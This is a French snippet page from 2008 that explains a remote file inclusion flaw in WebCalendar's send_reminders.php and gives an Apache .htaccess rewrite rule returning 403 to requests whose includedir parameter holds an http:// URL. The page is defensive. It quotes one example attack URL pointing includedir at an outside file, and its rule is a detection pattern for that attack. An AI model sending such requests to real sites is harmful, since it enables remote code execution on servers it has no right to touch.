Bouts de Codes

Eviter les attaques par le script send_reminders.php

Information sur le code source

Enregistré le 25 Mai 2008 - Vu 6104 fois
Code source zippé: télécharger le zip
Impression: imprimer le code
  • Sociale bookmarking: Digg ce code sur digg.com
  • Bookmark ce code sur del.icio.us
  • Partage ce code sur Facebook
  • Bookmark ce code sur Google
  • Bookmark ce code sur Yahoo
  • Ajoute Eviter les attaques par le script send_reminders.php
Votre avis: 
 
Ecrit par :  admin
[66] sources en Apache voir
 

Description du code source

Informations sur le code source

Votre site est peut-être vulnérable si vous avez WebCalendar. En effet vous risquez d'être victime d'une attaque par inclusion de code externe (remote file include vulnerability). Les url à l'origine de ces hacks sont de la forme :
http://www.example.om/tools/send_reminders.php?includedir=http://www.sitepourri.com/fichier.txt?
Une petite règle dans le fichier .htaccess vous protégera des hackers en retournant une code 403 (accès interdit) à chaque tentative d'accès.

Code Source



.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
.24
 

################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Eviter les attaques par le script send_reminders.php        #
#                                                                              #
# URL            : http://www.urlrewriting.fr/scripts32-Apache.htm             #
# Auteur         : admin                                                       #
# Date édition   : 25 Mai 2008                                                 #
#                                                                              #
################################################################################

RewriteEngine on
RewriteCond %{QUERY_STRING} ^(.*&)?includedir=http://
RewriteRule ^(.*/)?tools/send_reminders.php - [F,L]

Ajouter un commentaire

RSS
snippets


RSS
commentaires

 
Code de sécurité

Attention: Les champs marqués d'une étoile * sont obligatoires
Librairie

Langages de programmation

La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 références facilement accessibles. Visiter

  • Précis & Concis : Apache
  • Apache en action
  • Apache Tomcat 6 - Guide d administration du serveur Java EE sous Windows et Linux
  • Apache : La Référence
  • Apache
  • PHP 5.2 et APACHE 2 - Maîtrisez le développement et le déploiement de votre site web interactif [Nouvelle version]
  • Montez votre serveur de A à Z
  • Serveurs LAMP : Administration de la plate-forme Web
  • LAMP (Linux, Apache, MySQL, PHP) Pack 4 volumes : Maîtrisez vos applications Web en Open Source
  • Debian GNU/Linux - Services réseaux (Bind DNS, Apache, NFS, Samba, Messagerie...)